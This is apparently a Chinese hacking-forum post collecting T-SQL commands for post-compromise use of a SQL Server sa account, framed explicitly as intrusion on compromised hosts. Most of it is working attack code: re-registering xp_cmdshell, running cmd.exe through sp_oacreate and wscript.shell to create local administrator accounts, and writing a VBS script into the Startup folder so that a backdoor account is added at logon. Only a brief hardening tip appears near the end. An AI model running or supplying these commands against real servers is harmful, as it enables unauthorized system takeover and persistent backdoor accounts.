SA入侵時候刪除CMDSHELL的經(jīng)典回答集合（100%成功）

SA入侵時候刪除CMDSHELL的經(jīng)典回答集合（100%成功）

入侵的時候遇到了。 就給大家總結(jié)了以后發(fā)布出來了。

用這些命令恢復(fù)一下xp_cmdshell

開啟cmdshell的SQL語句

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判斷存儲擴展是否存在

Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'

返回結(jié)果為1就OK

恢復(fù)xp_cmdshell

Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'

返回結(jié)果為1就OK

否則上傳xplog7.0.dll

Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'

掃到SQL弱口令后利用SQLTOOLS出現(xiàn)未能找到存儲過程 'master..xp_cmdshell'

這種情況的主要原因是刪除了擴展存儲過過程xp_cmdshell， 有一個恢復(fù)的辦法， 如果不成功說明被改名了

使用SQLTOOLS連接， 連接后在利用目錄下點執(zhí)行數(shù)據(jù)庫命令， 執(zhí)行：

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

運氣好的話就成功了， 如果你想讓你的肉雞用SQL執(zhí)行不了DOS命令的話， 執(zhí)行：

sp_dropextendedproc "xp_cmdshell"

就執(zhí)行不了DOS命令了， 當然用上面的語句可以復(fù)原。

用SQLTOOLS可以連接成功， 執(zhí)行DOS命令， 卻總是顯示這個、、、拒絕了對對象 'xp_cmdshell'（數(shù)據(jù)庫 'master'， 所有者 'dbo'）的 EXECUTE 權(quán)限。

怎么解決？？？？

上傳文件也不行。 。 。

1 未能找到存儲過程'master..xpcmdshell'。

恢復(fù)方法：查詢分離器連接后，

第一步執(zhí)行：EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int

第二步執(zhí)行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

然后按F5鍵命令執(zhí)行完畢。

2 無法裝載 DLL xpsql70.dll 或該DLL所引用的某一DLL。 原因126（找不到指定模塊。 ）

恢復(fù)方法：查詢分離器連接后，

第一步執(zhí)行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int

第二步執(zhí)行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

然后按F5鍵命令執(zhí)行完畢。

3 無法在庫 xpweb70.dll 中找到函數(shù) xp_cmdshell。 原因: 127(找不到指定的程序。 )

恢復(fù)方法：查詢分離器連接后,

第一步執(zhí)行：exec sp_dropextendedproc 'xp_cmdshell'

第二步執(zhí)行：exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

然后按F5鍵命令執(zhí)行完畢。

四.終極方法：

如果以上方法均不可恢復(fù)， 請嘗試用下面的辦法直接添加帳戶：

查詢分離器連接后，

2000servser系統(tǒng):

declare @shell int exec sp_oacreate 'wscript.shell',@shell output

exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用戶 密碼 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用戶 /add'

xp或2003server系統(tǒng):

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用戶 密碼 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用戶 /add'

還不行就沒辦法了

方法1:查詢分離器連接后執(zhí)行：

if exists (select * from

dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and

OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

GO

然后按F5鍵命令執(zhí)行完畢

方法2:查詢分離器連接后

第一步執(zhí)行：use master

第二步執(zhí)行：sp_dropextendedproc 'xp_cmdshell' 然后按F5鍵命令執(zhí)行完畢

1 未能找到存儲過程'master..xpcmdshell'. 恢復(fù)方法：查詢分離器連接后,

第一步執(zhí)行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int

第二步執(zhí)行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 然后按F5鍵命令執(zhí)行完畢

2 無法裝載 DLL xpsql70.dll 或該DLL所引用的某一 DLL。 原因126（找不到指定模塊。 ）

恢復(fù)方法：查詢分離器連接后,

第一步執(zhí)行：sp_dropextendedproc "xp_cmdshell"

第二步執(zhí)行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'然后按F5鍵命令執(zhí)行完畢

3 無法在庫 xpweb70.dll 中找到函數(shù) xp_cmdshell。 原因: 127(找不到指定的程序。 )

恢復(fù)方法：查詢分離器連接后,

第一步執(zhí)行:exec sp_dropextendedproc 'xp_cmdshell'

第二步執(zhí)行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

然后按F5鍵命令執(zhí)行完畢

四.終極方法.如果以上方法均不可恢復(fù),請嘗試用下面的辦法直接添加帳戶:

1,查詢分離器連接后,

2000servser系統(tǒng):

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user yszar andylau /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators yszar /add'

xp或2003server系統(tǒng):

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用戶名 密碼 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用戶名 /add'

或者可以

declare @o int

exec sp_oacreate 'wscript.shell', @o out

exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX為你要執(zhí)行的命令

有時候用查詢分離器連接執(zhí)行以上語句的時候會出現(xiàn)找不到存儲過程 sp_addextendedproc

解決方法:

create procedure sp_addextendedproc --- 1996/08/30 20:13

@functname nvarchar(517),/* (owner.)name of function to call */

@dllname varchar(255)/* name of DLL containing function */

as

set implicit_transactions off

if @@trancount > 0

begin

raiserror(15002,-1,-1,'sp_addextendedproc')

return (1)

end

dbcc addextendedproc( @functname, @dllname)

return (0) -- sp_addextendedproc

GO

這段代碼貼入查詢分離器,執(zhí)行

1.突破xplog70.dll

declare @cmd INT

exec sp_oacreate 'wscript.shell',@cmd output

exec sp_oamethod @cmd,'run',null,'net user 用戶名 密碼 /add','0','true'

declare @cmd INT

exec sp_oacreate 'wscript.shell',@cmd output

exec sp_oamethod @cmd,'run',null,'net localgroup administrators 用戶名 /add','0','true'

2.恢復(fù)xp_cmdshell

先嘗試恢復(fù)xp_cmdshell， sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'，

結(jié)果發(fā)現(xiàn)xpsql70.dll被刪除。

然后寫vbs文件到啟動組里面：

declare @o int, @f int, @t int, @ret int ,@a int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'createtextfile', @f out,

'c:\\docume~1\\alluse~1\\「開始」菜單\\程序\\啟動\\a.vbs', 1

exec @ret = sp_oamethod @f, 'writeline', NULL,

'set wshshell=createobject("wscript.shell")'

exec @ret = sp_oamethod @f, 'writeline', NULL,

'a=wshshell.run ("cmd.exe /c net user lintao lintao520 /add",0)'

exec @ret = sp_oamethod @f, 'writeline', NULL,

'b=wshshell.run ("cmd.exe /c net localgroup administrators lintao /add",0)'

3.去除SA的xp_cmdshell權(quán)限

如果你不需要擴展存儲過程xp_cmdshell請把它去掉。 使用這個SQL語句：

use master

sp_dropextendedproc 'xp_cmdshell'

xp_cmdshell是進入操作系統(tǒng)的最佳捷徑， 是數(shù)據(jù)庫留給操作系統(tǒng)的一個大后門。 如果你需要這個存儲過程， 請用這個語句也可以恢復(fù)過來。

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

4.上傳xplog7.0.dll：

exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'